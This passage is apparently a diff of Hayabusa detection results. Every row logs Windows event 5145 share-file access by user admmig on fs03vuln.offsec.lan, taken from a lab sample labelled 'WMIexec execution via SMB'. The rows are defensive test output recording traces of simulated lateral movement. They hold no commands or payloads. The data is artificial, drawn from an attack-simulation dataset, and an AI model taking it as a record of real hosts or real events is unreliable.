+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
